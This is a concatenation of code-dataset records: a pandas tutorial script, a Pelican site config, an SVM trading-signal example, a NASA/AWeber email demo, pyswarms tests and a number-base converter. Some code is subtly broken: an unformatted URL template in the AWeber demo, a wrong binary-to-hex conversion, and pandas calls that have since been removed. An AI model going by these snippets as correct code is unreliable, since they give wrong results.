number选取多个\r\nobj[obj < 2] # 筛选 value < 2\r\n\r\n# Slicing with labels behaves differently than normal Python slicing in that the endpoint is inclusive:\r\nobj['b':'c'] # 通过label slice包含endpoint\r\n# Setting using these methods works just as you would expect:\r\nobj['b':'c'] = 5 # 重新对label为'b'和'c'的value设值\r\n\r\ndata = DataFrame(np.arange(16).reshape((4, 4)),\r\n index=['Ohio', 'Colorado', 'Utah', 'New York'],\r\n columns=['one', 'two', 'three', 'four'])\r\ndata['two'] \r\ndata[['three', 'one']] # index columns\r\n\r\ndata[:2] # 选择第0行和第1行 (row)\r\ndata[data['three'] > 5] # 选择所有column 'three'的值大于5的row\r\n\r\n# indexing with a boolean DataFrame\r\ndata < 5 # 返回一个全部由True/False构成的df\r\ndata[data < 5] = 0 # 将df data中小于5的元素全部设为0\r\n# index both row and column\r\ndata.ix['Colorado', ['two', 'three']] # index row label & column label\r\ndata.ix[['Colorado', 'Utah'], [3, 0, 1]] # index rol label & column position number\r\ndata.ix[2] # index 第3行 position number从0开始\r\ndata.ix[:'Utah', 'two'] # index 所有到'Utah'之前的row 和 column with label 'two'\r\ndata.ix[data.three > 5, :3] # index column 'three'大于5的所有行,取其前3列\r\n\r\n\r\n###########\r\n# Arithmetic and data alignment\r\n###########\r\n# When adding together objects, if any index pairs are not the same, the respective index \r\n# in the result will be the union of the index pairs.\r\ns1 = Series([7.3, -2.5, 3.4, 1.5], index=['a', 'c', 'd', 'e'])\r\ns2 = Series([-2.1, 3.6, -1.5, 4, 3.1], index=['a', 'c', 'e', 'f', 'g'])\r\ns1 + s2\r\n# The internal data alignment introduces NA values in the indices that don’t overlap.\r\n# Missing values propagate in arithmetic computations.\r\n\r\n# Adding these together returns a DataFrame whose index and columns are the unions\r\n# of the ones in each DataFrame:\r\ndf1 = DataFrame(np.arange(9.).reshape((3, 3)), columns=list('bcd'),\r\n index=['Ohio', 'Texas', 'Colorado'])\r\ndf2 = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),\r\n index=['Utah', 'Ohio', 'Texas', 'Oregon'])\r\ndf1 + df2\r\n\r\n# Arithmetic methods with fill values\r\ndf1 = DataFrame(np.arange(12.).reshape((3, 4)), columns=list('abcd'))\r\ndf2 = DataFrame(np.arange(20.).reshape((4, 5)), columns=list('abcde'))\r\n# Adding these together results in NA values in the locations that don’t overlap:\r\ndf1 + df2\r\n# Using the add method on df1, I pass df2 and an argument to fill_value:\r\ndf1.add(df2, fill_value=0)\r\n\r\n# Relatedly, when reindexing a Series or DataFrame, you can also specify a different fill value:\r\ndf1.reindex(index=df2.index, columns=df2.columns, fill_value=0)\r\ndf1.reindex(index=df2.index, columns=df2.columns, fill_value=0) + df2\r\n\r\n\r\n# Operations between DataFrame and Series\r\nframe = DataFrame(np.arange(12.).reshape((4, 3)), columns=list('bde'),\r\n index=['Utah', 'Ohio', 'Texas', 'Oregon'])\r\nseries = frame.ix[0]\r\n# By default, arithmetic between DataFrame and Series matches the index of the Series\r\n# on the DataFrame's columns, broadcasting down the rows:\r\nframe - series\r\n# If an index value is not found in either the DataFrame’s columns or the Series’s index,\r\n# the objects will be reindexed to form the union:\r\nseries2 = Series(range(3), index=['b', 'e', 'f'])\r\nframe + series2\r\n\r\n# If you want to instead broadcast over the columns, matching on the rows, you have to\r\n# use one of the arithmetic methods. 
\r\nseries3 = frame['d']\r\n# DataFrame.sub:Subtraction of dataframe and other, element-wise (binary operator sub).\r\n# frame中的每一列 减去 series3中的对应元素\r\nframe.sub(series3, axis=0) \r\n# The axis number that you pass is the axis to match on. In this case we mean to match\r\n# on the DataFrame’s row index and broadcast across.\r\n\r\n\r\n###########\r\n# Function application and mapping\r\n###########\r\n# NumPy ufuncs (element-wise array methods) work fine with pandas objects:\r\nframe = DataFrame(np.random.randn(4, 3), columns=list('bde'),\r\n index=['Utah', 'Ohio', 'Texas', 'Oregon'])\r\nnp.abs(frame)\r\n\r\n# Another frequent operation is applying a function on 1D arrays to each column or row.\r\n# DataFrame’s apply method does exactly this:\r\nf = lambda x: x.max() - x.min()\r\nframe.apply(f) # 默认axis=0,对于每个column apply lambda\r\nframe.apply(f, axis=1) # axis=1, 对每行(row) apply lambda\r\n\r\n# Many of the most common array statistics (like sum and mean) are DataFrame methods,\r\n# so using apply is not necessary.\r\nframe.mean() # 默认对每个column求均值\r\nframe.sum(axis=1) # axis=1对每行(row)求和\r\n\r\n# The function passed to apply need not return a scalar value, it can also return a Series\r\n# with multiple values:\r\ndef f(x):\r\n return Series([x.min(), x.max()], index=['min', 'max'])\r\nframe.apply(f) # 默认axis=0,对每个column求min和max\r\n \r\n# Element-wise Python functions can be used with applymap:\r\nformat = lambda x: '%.2f' % x # applymap对df中所有元素apply func\r\nframe.applymap(format)\r\n\r\n# The reason for the name applymap is that Series has a map method for applying an element-wise function: \r\nframe['e'].map(format)\r\n \r\n###########\r\n# Sorting and ranking\r\n###########\r\nobj = Series(range(4), index=['d', 'a', 'b', 'c'])\r\nobj.sort_index() # sort lexicographically by row or column index\r\n\r\nframe = DataFrame(np.arange(8).reshape((2, 4)), index=['three', 'one'],\r\n columns=['d', 'a', 'b', 'c'])\r\nframe.sort_index() # sort row index\r\nframe.sort_index(axis=1) # sort column index\r\nframe.sort_index(axis=1, ascending=False) # sort desc\r\n\r\n# To sort a Series by its values, use its order method:\r\nobj = Series([4, 7, -3, 2]) \r\nobj.order() # sort by value \r\n# Any missing values are sorted to the end of the Series by default:\r\nobj = Series([4, np.nan, 7, np.nan, -3, 2])\r\nobj.order() # sort by value; missing values are sorted to the end\r\n\r\nframe = DataFrame({'b': [4, 7, -3, 2], 'a': [0, 1, 0, 1]})\r\n# frame.sort_index(by='b')\r\nframe.sort_values(by='b') # sort_index is deprecated\r\n# frame.sort_index(by=['a', 'b'])\r\nframe.sort_values(by=['a','b']) # To sort by multiple columns, pass a list of names:\r\n\r\n# Ranking is closely related to sorting, assigning ranks from one through the number of \r\n# valid data points in an array. 
\r\nobj = Series([7, -5, 7, 4, 2, 0, 4])\r\nobj.rank() # by default rank breaks ties by assigning each group the mean rank\r\nobj.rank(method='first') # ranks may be assigned according to the order they’re observed in the data\r\nobj.rank(ascending=False, method='max') # 'max': rank breaks ties by assigning the maximum rank\r\n\r\nframe = DataFrame({'b': [4.3, 7, -3, 2], 'a': [0, 1, 0, 1],\r\n 'c': [-2, 5, 8, -2.5]})\r\nframe.rank(axis=1) # axis=1; 每行rank(asc)\r\nframe.rank() # 默认axis=0, method='average';每列rank(asc)\r\n\r\n###########\r\n# Axis indexes with duplicate values\r\n###########\r\nobj = Series(range(5), index=['a', 'a', 'b', 'b', 'c'])\r\nobj.index.is_unique # 返回False; index有重复,不是unique\r\n\r\nobj['a'] # index 'a'对应多个values,返回一个series\r\nobj['c'] # index 唯一对应value,返回一个数值\r\n\r\ndf = DataFrame(np.random.randn(4, 3), index=['a', 'a', 'b', 'b'])\r\ndf.ix['b'] # index 'b'对应多个value,返回一个sub df\r\n\r\n\r\n#####################################################\r\n# Summarizing and Computing Descriptive Statistics\r\n#####################################################\r\ndf = DataFrame([[1.4, np.nan], [7.1, -4.5],\r\n [np.nan, np.nan], [0.75, -1.3]],\r\n index=['a', 'b', 'c', 'd'],\r\n columns=['one', 'two'])\r\ndf.sum() # compute column sum\r\ndf.sum(axis=1) # compute row sum\r\ndf.mean(axis=1, skipna=False) # 默认skipna=True; skipna设为False后有NaN的 则 Descriptive Statistics 也会为NaN\r\n\r\n# Some methods, like idxmin and idxmax, return indirect statistics like the index value\r\n# where the minimum or maximum values are attained:\r\ndf.idxmax() # 返回每个column最大值所对应的index; 同理df.idxmin()\r\ndf.cumsum() # 返回每列由上到下的累计和\r\ndf.describe() # 返回每列的描述统计量\r\n\r\nobj = Series(['a', 'a', 'b', 'c'] * 4)\r\nobj.describe() # 返回series的描述统计量\r\n\r\n#############\r\n# Correlation and Covariance\r\n############\r\nimport pandas_datareader.data as web # import pandas.io.data as web\r\n\r\nall_data = {}\r\nfor ticker in ['AAPL', 'IBM', 'MSFT', 'GOOG']:\r\n all_data[ticker] = web.get_data_yahoo(ticker, '1/1/2000', '1/1/2010')\r\n\r\nprice = DataFrame({tic: data['Adj Close']\r\n for tic, data in all_data.items()})\r\nvolume = DataFrame({tic: data['Volume']\r\n for tic, data in all_data.items()})\r\n# compute percent changes of the prices:\r\nreturns = price.pct_change() # percent change over given number of periods\r\nreturns.tail()\r\n# The corr method of Series computes the correlation of the overlapping, non-NA,\r\n# aligned-by-index values in two Series. Relatedly, cov computes the covariance:\r\nreturns.MSFT.corr(returns.IBM)\r\nreturns.MSFT.cov(returns.IBM)\r\n\r\n# DataFrame’s corr and cov methods, on the other hand, return a full correlation or\r\n# covariance matrix as a DataFrame, respectively:\r\nreturns.corr()\r\nreturns.cov()\r\n\r\n# Compute pairwise correlations between a DataFrame’s columns or rows with another \r\n# Series or DataFrame using DataFrame’s corrwith method:\r\nreturns.corrwith(returns.IBM)\r\n# Passing a DataFrame computes the correlations of matching column names. 
Here I\r\n# compute correlations of percent changes with volume:\r\nreturns.corrwith(volume)\r\n\r\n###########\r\n# Unique Values, Value Counts, and Membership\r\n###########\r\nobj = Series(['c', 'a', 'd', 'a', 'a', 'b', 'b', 'c', 'c'])\r\nuniques = obj.unique() # 不一定按顺序;可用 uniques.sort()来排序\r\n\r\nobj.value_counts() # 返回每个unique value的频数\r\npd.value_counts(obj.values, sort=False) # 默认sort=True\r\n\r\nmask = obj.isin(['b', 'c'])\r\nmask # mask是obj series根据条件的True/False\r\nobj[mask] # 返回obj中在mask对应为True的值;等价于obj[obj.isin(['b','c'])]\r\n\r\n# Compute a histogram on multiple related columns in a DataFrame:\r\ndata = DataFrame({'Qu1': [1, 3, 4, 3, 4],\r\n 'Qu2': [2, 3, 1, 2, 3],\r\n 'Qu3': [1, 5, 2, 4, 4]})\r\nresult = data.apply(pd.value_counts).fillna(0)\r\n\r\n\r\n############################\r\n# Handling Missing Data\r\n############################\r\nstring_data = Series(['aardvark', 'artichoke', np.nan, 'avocado'])\r\nstring_data.isnull() # string_data.notnull()\r\n\r\n# The built-in Python None value is also treated as NA in object arrays:\r\nstring_data[0] = None\r\nstring_data.isnull()\r\n\r\n############\r\n# Filtering Out Missing Data\r\n############\r\nfrom numpy import nan as NA\r\ndata = Series([1, NA, 3.5, NA, 7])\r\n\r\n# 移除缺失值\r\ndata.dropna() # 移除缺失值\r\ndata[data.notnull()] # 通过构建一个boolean index来手动过滤缺失值\r\n\r\n# In Data Frame, dropna by default drops 'any' row containing a missing value:\r\ndata = DataFrame([[1., 6.5, 3.], [1., NA, NA],\r\n [NA, NA, NA], [NA, 6.5, 3.]]) # 通过list构建df,每个list是一个row\r\ncleaned = data.dropna() # 只保留为一一个没有NA的row, 默认how='any'\r\n \r\n# Passing how='all' will only drop rows that are all NA:\r\ndata.dropna(how='all')\r\n\r\n# Dropping columns in the same way is only a matter of passing axis=1: \r\ndata[4] = NA \r\ndata.dropna(axis=1, how='all') # axis=1, drop所有值为NaN的column\r\n\r\n# Suppose you want to keep only rows containing a certain number of observations. 
\r\n# You can indicate this with the thresh argument:\r\ndf = DataFrame(np.random.randn(7, 3))\r\ndf.ix[:4, 1] = NA; df.ix[:2, 2] = NA # 制造缺失值\r\ndf.dropna(thresh=3) # 只保留row中有至少3个observation的row\r\n\r\n###########\r\n# Filling in Missing Data\r\n###########\r\n# Calling fillna with a constant replaces missing values with that value:\r\ndf.fillna(0)\r\n# Calling fillna with a dict you can use a different fill value for each column:\r\ndf.fillna({1: 0.5, 2: -1}) # column1的NaN fill 0.5, column2的NaN fill -1 \r\n\r\n# fillna returns a new object, but you can modify the existing object in place:\r\n_ = df.fillna(0, inplace=True)\r\n\r\ndf = DataFrame(np.random.randn(6, 3))\r\ndf.ix[2:, 1] = NA; df.ix[4:, 2] = NA\r\n\r\ndf.fillna(method='ffill')\r\ndf.fillna(method='ffill', limit=2)\r\ndf.fillna(df.mean()) # 使用每列的均值 替代缺失值\r\n\r\ndata = Series([1., NA, 3.5, NA, 7])\r\ndata.fillna(data.mean()) # 使用series的均值 替代缺失值\r\n\r\n\r\n##################################\r\n# Hierarchical Indexing\r\n##################################\r\ndata = Series(np.random.randn(10), # multiple indexes\r\n index=[['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'd', 'd'],\r\n [1, 2, 3, 1, 2, 3, 1, 2, 2, 3]]) \r\ndata.index\r\n\r\n# partial index\r\ndata['b']\r\ndata['b':'c'] # index label: includes endpoints\r\ndata.ix[['b', 'd']] # index label\r\n\r\n# Selection is even possible in some cases from an “inner” level:\r\ndata[:, 2] # 每个字母index中的 数字index 2所对应的value\r\n\r\n# Hierarchical indexing plays a critical role in reshaping data and group-based operations\r\n# like forming a pivot table.\r\n# rearrange a DataFrame with unstack method:\r\ndata.unstack() # 本来的两层index变为了row index和column\r\ndata.unstack().stack() # The inverse operation of unstack is stack\r\n\r\nframe = DataFrame(np.arange(12).reshape((4, 3)),\r\n index=[['a', 'a', 'b', 'b'], [1, 2, 1, 2]],\r\n columns=[['Ohio', 'Ohio', 'Colorado'],\r\n ['Green', 'Red', 'Green']])\r\nframe.index.names = ['key1', 'key2']\r\nframe.columns.names = ['state', 'color']\r\n# With partial column indexing you can similarly select groups of columns:\r\nframe['Ohio']\r\n# A MultiIndex can be created by itself and then reused; the columns in the above DataFrame with level \r\n# names could be created like this:\r\nfrom pandas import MultiIndex\r\nMultiIndex.from_arrays([['Ohio', 'Ohio', 'Colorado'], ['Green', 'Red', 'Green']],\r\n names=['state', 'color'])\r\n\r\n###########\r\n# Reordering and Sorting Levels\r\n###########\r\n# The swaplevel takes two level numbers or names and returns a new object with \r\n# the levels interchanged (but the data is otherwise unaltered):\r\nframe.swaplevel('key1', 'key2')\r\n\r\n# sortlevel, on the other hand, sorts the data (stably) using only the values in a single level. \r\nframe.sortlevel(1) # sort第二层index, 第一层index是0(默认)\r\nframe.swaplevel(0, 1).sortlevel(0) # it’s not uncommon to also use sortlevel so that the result is lexicographically sorted\r\n\r\n############\r\n# Summary Statistics by Level\r\n############\r\n# Many descriptive and summary statistics on DataFrame and Series have a level option\r\n# in which you can specify the level you want to sum by on a particular axis. 
\r\nframe.sum(level='key2')\r\nframe.sum(level='color', axis=1)\r\n\r\n###########\r\n# Using a DataFrame’s Columns\r\n###########\r\nframe = DataFrame({'a': range(7), 'b': range(7, 0, -1),\r\n 'c': ['one', 'one', 'one', 'two', 'two', 'two', 'two'],\r\n 'd': [0, 1, 2, 0, 1, 2, 3]})\r\nframe2 = frame.set_index(['c', 'd'])\r\n# reset_index, on the other hand, does the opposite of set_index\r\nframe2.reset_index() # undo the index set on the previous line\r\n\r\n\r\n####################################\r\n# Other pandas Topics\r\n####################################\r\n\r\n############\r\n# Integer Indexing\r\n############\r\n# pandas could “fall back” on integer indexing, but there’s not a safe and\r\n# general way (that I know of) to do this without introducing subtle bugs. Here we have\r\n# an index containing 0, 1, 2, but inferring what the user wants (label-based indexing or\r\n# position-based) is difficult:\r\nser = Series(np.arange(3.))\r\nser[-1] # unlike built-in Python indexing, this raises an error\r\n# On the other hand, with a non-integer index, there is no potential for ambiguity:\r\nser2 = Series(np.arange(3.), index=['a', 'b', 'c'])\r\nser2[-1]\r\n\r\nser.ix[:1]\r\n\r\nser3 = Series(range(3), index=[-5, 1, 3])\r\nser3.iloc[2] # position-based indexing (positions start at 0; select position 2)\r\n # deprecated: ser3.iget_value(2)\r\nframe = DataFrame((np.arange(6).reshape(3, 2)), index=[2, 0, 1])\r\nframe.iloc[0] # position-based indexing; select the first row\r\n\r\n###########\r\n# Panel Data\r\n###########\r\n\r\n# Pandas has a Panel data structure, which can be thought of as a three-dimensional analogue of DataFrame. \r\nimport pandas_datareader.data as web\r\n# Create panel data with a dict of DataFrame\r\npdata = pd.Panel(dict((stk, web.get_data_yahoo(stk, '1/1/2009', '6/1/2012'))\r\n for stk in ['AAPL', 'GOOG', 'MSFT', 'DELL']))\r\npdata = pdata.swapaxes('items', 'minor')\r\npdata['Adj Close']\r\n\r\n# ix-based label indexing generalizes to three dimensions, so we can select all data at a\r\n# particular date or a range of dates like so:\r\npdata.ix[:, '6/1/2012', :]\r\npdata.ix['Adj Close', '5/22/2012':, :]\r\n\r\nstacked = pdata.ix[:, '5/30/2012':, :].to_frame()\r\n# DataFrame has a related to_panel method, the inverse of to_frame:\r\nstacked.to_panel()\r\n\r\n","sub_path":"pandas_basics/pandas_04_DAP_01_intro.py","file_name":"pandas_04_DAP_01_intro.py","file_ext":"py","file_size_in_byte":27267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
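A closing note on the Panel examples in the pandas record above: Panel was deprecated in pandas 0.20 and removed in 0.25, so on current pandas the usual replacement is a DataFrame with a (ticker, date) MultiIndex, or an xarray structure. A minimal sketch of the concat-with-keys equivalent, with small random frames standing in for the Yahoo downloads:

import numpy as np
import pandas as pd

dates = pd.date_range('2012-05-30', periods=3)
frames = {stk: pd.DataFrame(np.random.randn(3, 2),
                            index=dates, columns=['Adj Close', 'Volume'])
          for stk in ['AAPL', 'GOOG']}

# concat with keys builds the hierarchical index that Panel used to model
stacked = pd.concat(frames, names=['ticker', 'date'])
print(stacked.loc['AAPL'])                 # one ticker's frame
print(stacked.xs(dates[0], level='date'))  # every ticker on one date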
u'Quack1'\nSITENAME = u'Quack1☠Blog'\nSIDEBAR_DIGEST = u'Blog-Notes of a Linux/Security/Hacking guy'\nSITEURL = 'http://quack1.me'\nRELATIVE_URLS = True\nFEED_DOMAIN = SITEURL\nAVATAR = u'upload/avatar.png'\n\nTIMEZONE = 'Europe/Paris'\nDATE_FORMATS = {\n 'fr' : '%d/%m/%Y',\n 'en' : '%d/%m/%Y',\n}\nDEFAULT_LANG = u'fr'\n\n#THEME = \"notebook\"\nTHEME = \"./themes/notebook\"\nPDF_GENERATOR = False\n\n# Blogroll\n\n# Social widget\nSOCIAL = (('Twitter', 'https://twitter.com/_Quack1'),('Mail', 'mailto:blog@quack1.me'))\nTWITTER_USERNAME = \"_Quack1\"\n\nBLOGROLL = (\n ('Zythom', 'http://zythom.blogpost.com'),\n ('Sid', 'http://sid.rstack.org/blog'),\n ('Korben', 'http://korben.info'),\n ('Le Blog des Nouvelles Technologies', 'http://blognt.fr'),\n ('Commit Strip', 'http://www.commitstrip.com/fr/'),\n ('Planet-Libre', 'http://www.planet-libre.org/'),\n ('Planet-Ubuntu', 'http://planet.ubuntu-fr.org/'),\n ('Conix Security', 'http://conixsecurity.fr/'),\n ('GCU-Squad', 'http://www.gcu-squad.org/'),\n ('La Grotte Du Barbu', 'http://lagrottedubarbu.com/'),\n ('JcFrog', 'http://jcfrog.com/blog/')\n )\n\nDEFAULT_PAGINATION = 10\nSTATIC_PATHS = [\"upload\"]\nDISPLAY_PAGES_ON_MENU = \"True\"\n\nFEED_ATOM = 'feeds/all.atom.xml'\nFEED_ALL_ATOM = 'feeds/all.all.atom.xml'\nCATEGORY_FEED_ATOM = 'feeds/category_%s.atom.xml'\nTAG_FEED_ATOM = 'feeds/tag_%s.atom.xml'\n\n# Tag Cloud\nTAG_CLOUD_STEPS = 10\nTAG_CLOUD_MAX_ITEMS = 1000\n\n# Extensions\nPLUGINS = ['pelican.plugins.sitemap','pelican.plugins.global_license']\nMD_EXTENSIONS = ['headerid', 'codehilite(css_class=highlight)', 'footnotes']\n\n# Firefox Affiliates\nFIREFOX_BANNERS = (('35549', '/theme/images/download_firefox.png', u'Télécharger Firefox : facile, amusant, génial'),\n ('36259', '/theme/images/download_firefox_android.png', u'Firefox for Android'))\n\nSITEMAP = {\n 'format': 'xml',\n 'priorities': {\n 'articles': 1,\n 'indexes': 0.75,\n 'pages': 0.75\n },\n 'changefreqs': {\n 'articles': 'daily',\n 'indexes': 'daily',\n 'pages': 'daily'\n }\n}\n\nEXTRA_PATH_METADATA = { 'extras/robots.txt': {'path': 'robots.txt'},\n \t'extras/humans.txt': {'path': 'humans.txt'}}\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"316540540","text":"# Source https://www.quantinsti.com/blog/machine-learning-classification-strategy-python?utm_medium=answer_is&utm_source=quora\n\n# Machine learning classification libraries\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import scorer\nfrom sklearn.metrics import accuracy_score\n \n# For data manipulation\nimport pandas as pd\nimport numpy as np\n \n# To plot\nimport matplotlib.pyplot as plt\nimport seaborn\n\n# To fetch data\nfrom pandas_datareader import data as pdr\n\nDf = pdr.get_data_yahoo('SPY', start=\"2012-01-01\", end=\"2017-10-01\") \nDf= Df.dropna()\nDf.Close.plot(figsize=(10,5))\nplt.ylabel(\"S&P500 Price\")\nplt.show()\n\n\n\n#Step 3: Determine the target variable\ny = np.where(Df['Close'].shift(-1) > Df['Close'],1,-1)\n\n#Step 4: Creation of predictors variables\n\nDf['Open-Close'] = Df.Open - Df.Close\nDf['High-Low'] = Df.High - Df.Low\nX=Df[['Open-Close','High-Low']]\n\n#Step 5: Test and train dataset split\n\nsplit_percentage = 0.8\nsplit = int(split_percentage*len(Df))\n\n# Train data set\nX_train = X[:split]\ny_train = y[:split]\n\n# Test data set\nX_test = X[split:]\ny_test = y[split:]\n\n\n#Step 6: Create the machine learning classification 
model using the train dataset\n\ncls = SVC().fit(X_train, y_train)\n\n#Step 7: The classification model accuracy\n\naccuracy_train = accuracy_score(y_train, cls.predict(X_train))\naccuracy_test = accuracy_score(y_test, cls.predict(X_test))\nprint('\\nTrain Accuracy:{: .2f}%'.format(accuracy_train*100))\nprint('Test Accuracy:{: .2f}%'.format(accuracy_test*100))\n\n#Step 8: Prediction\n\nDf['Predicted_Signal'] = cls.predict(X)\n\n# Calculate log returns\nDf['Return'] = np.log(Df.Close.shift(-1) / Df.Close)*100\nDf['Strategy_Return'] = Df.Return * Df.Predicted_Signal\nDf.Strategy_Return.iloc[split:].cumsum().plot(figsize=(10,5))\nplt.ylabel(\"Strategy Returns (%)\")\nplt.show()\n\n","sub_path":"examples_heap/PrognozeSmth.py","file_name":"PrognozeSmth.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275708046","text":"import requests\n\nfrom requests_oauthlib import OAuth1Session\nfrom configparser import ConfigParser\nfrom datetime import date, datetime\nfrom pprint import pprint\n\nconfig = ConfigParser()\nconfig.read('apiconfig.ini')\n\nnasa_key = config['nasa_api']['api_key']\n\naweber = OAuth1Session(config['aweber_api']['consumer_key'],\n config['aweber_api']['consumer_secret'],\n config['aweber_api']['access_key'],\n config['aweber_api']['access_secret'])\n\na_id = config['aweber_account']['account_id']\nli_id = config['aweber_account']['list_id']\n\nneows_feed = 'https://api.nasa.gov/neo/rest/v1/feed'\ntodays_date = date.today().isoformat()\nneows_params = {\n 'start_date': todays_date,\n 'end_date': todays_date,\n 'api_key': nasa_key\n}\n\nresponse = requests.get(neows_feed, params=neows_params)\n\nprint('Response Status Code: ' + str(response.status_code))\nobjects = response.json()\nfor obj in objects['near_earth_objects'][todays_date]:\n pprint(obj)\n\nname = ''\nmagnitude = 0\nlink = ''\nif objects['near_earth_objects'][todays_date]:\n name = objects['near_earth_objects'][todays_date][0]['name']\n magnitude = objects['near_earth_objects'][todays_date][0]['absolute_magnitude_h']\n link = objects['near_earth_objects'][todays_date][0]['nasa_jpl_url']\n\nmessage_data = {\n 'is_archived': 'true',\n 'subject': 'Look out Earthlings, an asteroid is near!',\n 'body_html': ''\n f'Look out, an asteroid called {name} is approaching!
<br>'\n f'It has a magnitude of {magnitude}.<br>'\n f'You can learn more at <a href=\"{link}\">this link</a>.<br>
'\n 'See you next time!'\n ''\n}\n\nbroadcasts_url = 'https://api.aweber.com/1.0/accounts/{a_id}/lists/{li_id}/broadcasts'\nresponse = aweber.post(broadcasts_url, data=message_data)\n\nprint('Response Status Code: ' + str(response.status_code))\npprint(response.json())\n\nbroadcast_id = response.json()['broadcast_id']\nschedule_url = f'https://api.aweber.com/1.0/accounts/{a_id}/lists/{li_id}/broadcasts/{broadcast_id}/schedule'\nright_now = datetime.utcnow().isoformat()\nresp = aweber.post(schedule_url, data={'scheduled_for': right_now})\n\nprint(resp.status_code)\nprint(resp.json())\n\nbroad_resp = aweber.get(resp.json()['self_link'])\npprint(broad_resp.json())\n","sub_path":"nasa_demo.py","file_name":"nasa_demo.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"447515845","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Unit testing for pyswarms.grid_search\"\"\"\n\n# Import from __future__\nfrom __future__ import with_statement\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\n# Import modules\nimport unittest\nimport numpy as np\n\n# Import from package\nfrom pyswarms.utils.search.grid_search import GridSearch\nfrom pyswarms.single import LocalBestPSO\nfrom pyswarms.single import GlobalBestPSO\nfrom pyswarms.utils.functions.single_obj import sphere_func\n\nclass Base(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Sets up test fixtures\"\"\"\n self.optimizer = LocalBestPSO\n self.n_particles = 40\n self.dimensions = 20\n self.options = {'c1': [1, 2, 3],\n 'c2': [1, 2, 3],\n 'k' : [5, 10, 15],\n 'w' : [0.9, 0.7, 0.4],\n 'p' : [1]}\n self.mini_options = {'c1': [1,2],\n 'c2': 6,\n 'k': 5,\n 'w': 0.9,\n 'p': 0}\n self.bounds = (np.array([-5,-5]), np.array([5,5]))\n self.iters = 10\n self.objective_func = sphere_func\n self.g = GridSearch(self.optimizer, self.n_particles, self.dimensions,\n self.options, self.objective_func, self.iters,\n bounds=None, velocity_clamp=None)\n self.g_mini = GridSearch(self.optimizer, self.n_particles, self.dimensions,\n self.mini_options, self.objective_func, self.iters,\n bounds=None, velocity_clamp=None)\n\nclass MethodReturnType(Base):\n\n def test_search_min_best_options_return_type(self):\n \"\"\"Tests if best options returns a dictionary\"\"\"\n minimum_best_score, minimum_best_options = self.g.search()\n self.assertIsInstance(minimum_best_options, dict)\n\n def test_search_max_best_options_return_type(self):\n \"\"\"Tests if max best options returns a dictionary\"\"\"\n maximum_best_score, maximum_best_options = self.g.search(maximum=True)\n self.assertIsInstance(maximum_best_options, dict)\n\nclass MethodReturnValues(Base):\n\n def test_search_greater_values(self):\n \"\"\"Tests if max is greater than min in sample use-case\"\"\"\n minimum_best_score, minimum_best_options = self.g.search()\n maximum_best_score, maximum_best_options = self.g.search(maximum=True)\n self.assertGreater(maximum_best_score, minimum_best_score)\n\n def test_generate_grid(self):\n \"\"\"Tests if generate_grid function returns expected value.\"\"\"\n self.assertEqual(self.g_mini.generate_grid(),\n [{'c1': 1, 'c2': 6, 'k': 5, 'w': 0.9, 'p': 0},\n {'c1': 2, 'c2': 6, 'k': 5, 'w': 0.9, 'p': 0}])\n\nclass Instantiation(Base):\n\n def test_optimizer_type_fail(self):\n \"\"\"Tests that :code:`optimizer` of type :code:`string` raises\n :code:`TypeError`\"\"\"\n bad_optimizer = 'LocalBestPSO' # a string instead of a class object\n with 
self.assertRaises(TypeError):\n g = GridSearch(bad_optimizer, self.n_particles, self.dimensions,\n self.options, self.objective_func, self.iters,\n bounds=None, velocity_clamp=None)\n","sub_path":"tests/utils/search/test_gridsearch.py","file_name":"test_gridsearch.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"362145744","text":"use = True\nimport os\nimport time\nfrom sys import platform\n\ndef bannerwin():\n print(\" \")\n print(\".oPYo. o o \")\n print(\"8 8 8 8 \")\n print(\"8 .oPYo. odYo. o o 8 odYo. o8P \")\n print(\"8 8 8 8' `8 Y. .P 8 8' `8 8 \")\n print(\"8 8 8 8 8 8 `b..d' 8 8 8 8 \")\n print(\"`YooP' `YooP' 8 8 `YP' 8 8 8 8 \")\n print(\":.....::.....:..::..::...::....::..::..:\")\n print(\"::::::::::::::::::::::::::::::::::::::::\")\n print(\"::::::::::::::::::::::::::::::::::::::::\")\n print(\"ConvInt, found on github.com/georgeomnet\\n\")\n\ndef clearcheck():\n if \"win\" in platform.lower() or platform == \"darwin\":\n print(\"========================================================\\n\")\n else:\n os.system(\"clear\")\n\ndef errormessagelater():\n print(\"Sorry! That wasn't a valid answer.\")\n time.sleep(1)\n use = True\n clearcheck()\n \ndef runden():\n usernum = input(\"Enter your denary number: \")\n try:\n print(\"Here are the stats for %s:\" % usernum)\n print(\"Its hexadecimal is:\",format(int(usernum), '02X'))\n print(\"Its binary is:\",\"{0:b}\".format(int(usernum)))\n print(\"Its octal decimal is:\",oct(int(usernum)))\n except:\n print(\"Sorry, that number is not valid.\")\n runden()\n \ndef runbin():\n usernum = input(\"Enter your binary number: \")\n try:\n print(\"Here are the stats for %s:\" % usernum)\n print(\"Its denary is:\",int(usernum, 2))\n print(\"Its hexadecimal is:\",format(int(usernum), '02X')) \n print(\"Its octal decimal is:\",oct(int(usernum)))\n except:\n print(\"Sorry, that number is not valid.\")\n runbin()\n\ndef runhex():\n usernum = input(\"Enter your hexadecimal number: \")\n try:\n print(\"Here are the stats for %s:\" % usernum)\n print(\"Its denary is:\",int(usernum, 16))\n print(\"Its binary is:\",bin(int(usernum, 16))[2:])\n print(\"Its octal decimal is:\",oct(int(usernum, 16)))\n except:\n print(\"Sorry, that is not a valid hex.\")\n runhex()\n\n\ndef runoct():\n usernum = input(\"Enter your octal decimal: \")\n try:\n print(\"Here are the stats for %s\" % usernum)\n 